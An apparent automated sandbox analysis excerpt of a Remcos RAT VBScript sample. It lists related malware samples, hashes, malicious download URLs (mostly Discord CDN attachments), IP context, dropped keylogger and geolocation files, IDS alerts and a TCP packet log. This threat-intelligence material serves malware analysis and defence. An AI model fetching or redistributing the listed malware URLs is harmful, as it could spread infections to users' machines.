                            162.159.129.233Cheat_Lab_2.7.2.msiGet hashmaliciousUnknownBrowse
                            • cdn.discordapp.com/attachments/1175364766026436628/1175364839565176852/2
                            Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                            • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                            QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
                            SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
                            64AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousDCRatBrowse
                            • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                            http://162.159.129.233Get hashmaliciousUnknownBrowse
                            • 162.159.129.233/favicon.ico
                            2lfV6QiE6j.exeGet hashmaliciousUnknownBrowse
                            • cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
                            SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeGet hashmaliciousAmadeyBrowse
                            • cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
                            1PhgF7ujwW.exeGet hashmaliciousAmadeyBrowse
                            • cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
                            vhNyVU8USk.exeGet hashmaliciousAmadeyBrowse
                            • cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            cdn.discordapp.com1720605557.036432_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, Socks5Systemz, Stealc, Stealerium, VidarBrowse
                            • 162.159.134.233
                            file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                            • 162.159.133.233
                            script.vbsGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                            • 162.159.133.233
                            S#U0130PAR#U0130#U015e-260624.exeGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            S#U0130PAR#U0130#U015e-260624.exeGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            SIPARIS-270624.exeGet hashmaliciousUnknownBrowse
                            • 162.159.130.233
                            SIPARIS-270624.exeGet hashmaliciousUnknownBrowse
                            • 162.159.135.233
                            1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                            • 162.159.133.233
                            1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                            • 162.159.133.233
                            pastebin.com#U666e.#U901a.#U53d1.#U7968.#U52a9#U624b#U518c.exeGet hashmaliciousUnknownBrowse
                            • 104.20.4.235
                            purchase order-po-678.vbsGet hashmaliciousUnknownBrowse
                            • 104.20.4.235
                            Laun3cher_E@zy.exeGet hashmaliciousLummaC, Apollo, LummaC Stealer, XmrigBrowse
                            • 104.20.3.235
                            2U1S7Ab7YU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                            • 104.20.3.235
                            xj40xovMsm.exeGet hashmaliciousAsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLineBrowse
                            • 172.67.19.24
                            lfAhkuNN4g.exeGet hashmaliciousDCRatBrowse
                            • 172.67.19.24
                            ZfTfvfyShu.exeGet hashmaliciousUnknownBrowse
                            • 172.67.19.24
                            https://www.bnaminexg.com/Invoice-yetdr.zipGet hashmaliciousUnknownBrowse
                            • 172.67.19.24
                            https://www.bnaminexg.com/Invoice-yetdr.zipGet hashmaliciousUnknownBrowse
                            • 172.67.19.24
                            ptKNiAaGus.exeGet hashmaliciousUnknownBrowse
                            • 104.20.3.235
                            remcoss2024feb.duckdns.org17175746452965d299b9abacc784b7ea8c746b73d3a6cb5fa6fed6b62f3db9e05f4437a091611.dat-decoded.exeGet hashmaliciousRemcosBrowse
                            • 191.98.25.251
                            sostener.vbsGet hashmaliciousRemcosBrowse
                            • 191.98.25.251
                            envifa.vbsGet hashmaliciousRemcosBrowse
                            • 191.98.25.251
                            geoplugin.netfKPsJbn9jd.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 178.237.33.50
                            disputants stiftsfrkens.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 178.237.33.50
                            Payment Advise.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 178.237.33.50
                            SecuriteInfo.com.Win32.TrojanX-gen.16106.22101.exeGet hashmaliciousRemcosBrowse
                            • 178.237.33.50
                            pko_trans_details_20240710_105339#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                            • 178.237.33.50
                            gh.gh.gh.ghghghgh.docGet hashmaliciousRemcosBrowse
                            • 178.237.33.50
                            ghj.ghj.ghj.ghj.docGet hashmaliciousRemcos, DarkTortillaBrowse
                            • 178.237.33.50
                            igcc.exeGet hashmaliciousRemcos, DarkTortillaBrowse
                            • 178.237.33.50
                            REQUEST FOR QUOTE REF FT-NFL.xlsGet hashmaliciousRemcosBrowse
                            • 178.237.33.50
                            QUOTATION.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 178.237.33.50
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUS1720605557.036432_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, Socks5Systemz, Stealc, Stealerium, VidarBrowse
                            • 104.21.4.208
                            http://casls-primo-prod.hosted.exlibrisgroup.com/goto/https://materialesvite.com.mx/upload/GvIfdGvIfd/GvIfd/dGVzdEB0ZXN0LmNvbQ==Get hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                            • 104.18.11.207
                            https://www.canva.com/design/DAGKjIaIIOg/dnxUW38JksDdsGh-XKZQbw/edit?utm_content=DAGKjIaIIOg&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                            • 104.16.103.112
                            https://forms.office.com/r/dhZdq3i5FPGet hashmaliciousUnknownBrowse
                            • 1.1.1.1
                            Pierson Behr Attorneys..pdfGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.2.184
                            UniGetUI.Installer.exeGet hashmaliciousUnknownBrowse
                            • 188.114.96.3
                            https://d22mj5gnnq9fyc.cloudfront.net/releases/PLAY+by+Metrica+Sports+Setup+2.22.0.exeGet hashmaliciousUnknownBrowse
                            • 172.67.74.152
                            UniGetUI.Installer.exeGet hashmaliciousUnknownBrowse
                            • 188.114.96.3
                            joemalware.htmlGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            IdEZn6s5ga.exeGet hashmaliciousAzorult, GuLoaderBrowse
                            • 188.114.97.3
                            EPMTelecomunicacionesSAESPCOarm7.elfGet hashmaliciousMiraiBrowse
                            • 190.165.24.72
                            file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                            • 190.249.196.63
                            1QP92XNATU.elfGet hashmaliciousUnknownBrowse
                            • 181.131.221.12
                            https://kawak.com.coGet hashmaliciousUnknownBrowse
                            • 45.169.253.182
                            mirai.x86.elfGet hashmaliciousMiraiBrowse
                            • 181.128.43.250
                            BNd5XPrLzR.elfGet hashmaliciousMirai, MoobotBrowse
                            • 181.132.241.107
                            enjTj0J3qX.elfGet hashmaliciousMirai, MoobotBrowse
                            • 190.250.243.96
                            gO6RAJaFXe.elfGet hashmaliciousMiraiBrowse
                            • 201.232.21.110
                            r2ye3b3z8R.elfGet hashmaliciousMiraiBrowse
                            • 181.131.109.172
                            NV7VTiMkEA.elfGet hashmaliciousMirai, MoobotBrowse
                            • 190.128.37.202
                            CLOUDFLARENETUS1720605557.036432_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, Socks5Systemz, Stealc, Stealerium, VidarBrowse
                            • 104.21.4.208
                            http://casls-primo-prod.hosted.exlibrisgroup.com/goto/https://materialesvite.com.mx/upload/GvIfdGvIfd/GvIfd/dGVzdEB0ZXN0LmNvbQ==Get hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                            • 104.18.11.207
                            https://www.canva.com/design/DAGKjIaIIOg/dnxUW38JksDdsGh-XKZQbw/edit?utm_content=DAGKjIaIIOg&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                            • 104.16.103.112
                            https://forms.office.com/r/dhZdq3i5FPGet hashmaliciousUnknownBrowse
                            • 1.1.1.1
                            Pierson Behr Attorneys..pdfGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.2.184
                            UniGetUI.Installer.exeGet hashmaliciousUnknownBrowse
                            • 188.114.96.3
                            https://d22mj5gnnq9fyc.cloudfront.net/releases/PLAY+by+Metrica+Sports+Setup+2.22.0.exeGet hashmaliciousUnknownBrowse
                            • 172.67.74.152
                            UniGetUI.Installer.exeGet hashmaliciousUnknownBrowse
                            • 188.114.96.3
                            joemalware.htmlGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            IdEZn6s5ga.exeGet hashmaliciousAzorult, GuLoaderBrowse
                            • 188.114.97.3
                            ATOM86-ASATOM86NLfKPsJbn9jd.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 178.237.33.50
                            disputants stiftsfrkens.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 178.237.33.50
                            Payment Advise.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 178.237.33.50
                            SecuriteInfo.com.Win32.TrojanX-gen.16106.22101.exeGet hashmaliciousRemcosBrowse
                            • 178.237.33.50
                            pko_trans_details_20240710_105339#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                            • 178.237.33.50
                            gh.gh.gh.ghghghgh.docGet hashmaliciousRemcosBrowse
                            • 178.237.33.50
                            ghj.ghj.ghj.ghj.docGet hashmaliciousRemcos, DarkTortillaBrowse
                            • 178.237.33.50
                            igcc.exeGet hashmaliciousRemcos, DarkTortillaBrowse
                            • 178.237.33.50
                            REQUEST FOR QUOTE REF FT-NFL.xlsGet hashmaliciousRemcosBrowse
                            • 178.237.33.50
                            QUOTATION.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 178.237.33.50
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0e1720605557.036432_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, Socks5Systemz, Stealc, Stealerium, VidarBrowse
                            • 162.159.129.233
                            • 104.20.4.235
                            http://www.claimtopay.comGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            • 104.20.4.235
                            UniGetUI.Installer.exeGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            • 104.20.4.235
                            UniGetUI.Installer.exeGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            • 104.20.4.235
                            http://ashleypuerner.comGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            • 104.20.4.235
                            http://www.multipool.usGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            • 104.20.4.235
                            is it legal to dumpster dive in wisconsin 29664.jsGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            • 104.20.4.235
                            l0OB73W8ax.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            • 162.159.129.233
                            • 104.20.4.235
                            https://daslkjfhi2.xyzGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            • 104.20.4.235
                            run.vbsGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            • 104.20.4.235
                            No context
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):144
                            Entropy (8bit):3.38816599775145
                            Encrypted:false
                            SSDEEP:3:rhlKlVKfUlWlNhji5JWRal2Jl+7R0DAlBG45klovDl6v:6lV6UlWk5YcIeeDAlOWAv
                            MD5:94DF86C1D73DF26AA9D3119B13169FD3
                            SHA1:5F8FEED63416B9BFBB8DC311F2EE2C666BE145E5
                            SHA-256:5B45BD59974F621B03CD964EEF40791454A7D55BF070D77E1081F2DEA4A305D9
                            SHA-512:D268114E73A3906157B189A4F4C4B0862341BF12ABA8CB46F4481A615C8B2DF9BDF9EA62D84A9B2A5BDDB6ED107FEC2946796E51195BBB833609C78CC073056E
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                            Reputation:low
                            Preview:....[.2.0.2.4./.0.7./.1.0. .1.3.:.5.3.:.1.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):962
                            Entropy (8bit):5.013811273052389
                            Encrypted:false
                            SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                            MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                            SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                            SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                            SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1510207563435464
                            Encrypted:false
                            SSDEEP:3:NlllulR6f1Z:NllUc
                            MD5:E3A9DE2CB517872DD86F011FD073811F
                            SHA1:9157E9444559E1A626DDDF9F659FF18F8BCA36F0
                            SHA-256:7ABC0A81F079A37921907141B02FF0A5414B1D96B9073DE24B614D7C6996E244
                            SHA-512:D50A20E5C20518F16D121057DF1935AFF3388F2A037E3B1A8AD9EB994CE2471C8B281C26E351C1BA7496DD29D43022E0AA1E6B6C547CC756CF7E96263580B5C6
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:@...e.................................@..............@..........
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Entropy (8bit):3.4216927338817733
                            TrID:
                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                            • MP3 audio (1001/1) 32.22%
                            • Lumena CEL bitmap (63/63) 2.03%
                            • Corel Photo Paint (41/41) 1.32%
                            File name:envifa.vbs
                            File size:2'053'166 bytes
                            MD5:d7b8dbc995cd2e2d12eac713f4a422b3
                            SHA1:90f85e9d199fcb8362358e416125a69e9bdbacd3
                            SHA256:8c3b345a4476aaa0e7adbe1dff93abdaf70b6740f4d72c5f74f9bc2e3435feb9
                            SHA512:9d7da4355c10914257d5b6c69f2ec46b7435c0cb8d54f53a182c5d7b204a987ccc80912edd26ea070f20e996fe06654cf8e9904451215895791d2dc80b87db6a
                            SSDEEP:768:u9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9EM:BcfkPaJK6Sr58v6kccdD8F/99q3
                            TLSH:1295AF1217E65504F1E12A8D583641748F23BBA6AE39DA7C18FC240D5BF39888DE1FE7
                            File Content Preview:......'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....'. .C.o.p.y.r.i.g.h.t.:. .M.i.c.r.o.s.o.f.t. .C.o.r.p....
                            Icon Hash:68d69b8f86ab9a86
                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            07/10/24-19:53:11.852594TCP2018856ET TROJAN Windows executable base64 encoded44349732142.250.185.138192.168.2.4
                            07/10/24-19:53:15.950094TCP2020423ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M144349735162.159.129.233192.168.2.4
                            07/10/24-19:53:15.950094TCP2020424ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M144349735162.159.129.233192.168.2.4
                            TimestampSource PortDest PortSource IPDest IP
                            Jul 10, 2024 19:53:08.796852112 CEST4973080192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:08.801734924 CEST8049730104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:08.801898003 CEST4973080192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:08.802747011 CEST4973080192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:08.807579041 CEST8049730104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:09.292512894 CEST8049730104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:09.294096947 CEST49731443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:09.294136047 CEST44349731104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:09.294224977 CEST49731443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:09.300858021 CEST49731443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:09.300874949 CEST44349731104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:09.337528944 CEST4973080192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:09.785602093 CEST44349731104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:09.785769939 CEST49731443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:09.789486885 CEST49731443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:09.789499044 CEST44349731104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:09.789805889 CEST44349731104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:09.812777996 CEST49731443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:09.860505104 CEST44349731104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:10.329983950 CEST44349731104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:10.330105066 CEST44349731104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:10.330168009 CEST49731443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:10.334153891 CEST49731443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:12.325531006 CEST4973080192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:12.326294899 CEST49733443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:12.326329947 CEST44349733104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:12.326411009 CEST49733443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:12.326719999 CEST49733443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:12.326736927 CEST44349733104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:12.337203979 CEST8049730104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:12.337464094 CEST4973080192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:13.010006905 CEST44349733104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:13.011138916 CEST49733443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:13.011166096 CEST44349733104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:13.372447014 CEST44349733104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:13.372761965 CEST44349733104.20.4.235192.168.2.4
                            Jul 10, 2024 19:53:13.372817039 CEST49733443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:13.373161077 CEST49733443192.168.2.4104.20.4.235
                            Jul 10, 2024 19:53:14.964875937 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:14.964929104 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:14.965111017 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:14.965362072 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:14.965392113 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.455508947 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.455635071 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.457295895 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.457310915 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.457722902 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.458543062 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.500530005 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.768078089 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.768300056 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.768371105 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.768383980 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.768413067 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.768469095 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.768580914 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.768738031 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.768804073 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.768825054 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.768922091 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.768986940 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.769002914 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.769102097 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.769161940 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.769175053 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.821849108 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.821866035 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.858676910 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.858809948 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.858820915 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.858849049 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.858911037 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.858943939 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.859096050 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.859164000 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.859180927 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.859261990 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.859329939 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.859343052 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.859603882 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.859673977 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.859687090 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.859945059 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.860011101 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.860023975 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.860131025 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.860197067 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.860209942 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.860301018 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.860366106 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.860378981 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.860979080 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.861059904 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.861073017 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.861249924 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.861315966 CEST49735443192.168.2.4162.159.129.233
                            Jul 10, 2024 19:53:15.861327887 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.861860037 CEST44349735162.159.129.233192.168.2.4
                            Jul 10, 2024 19:53:15.861928940 CEST49735443192.168.2.4162.159.129.233
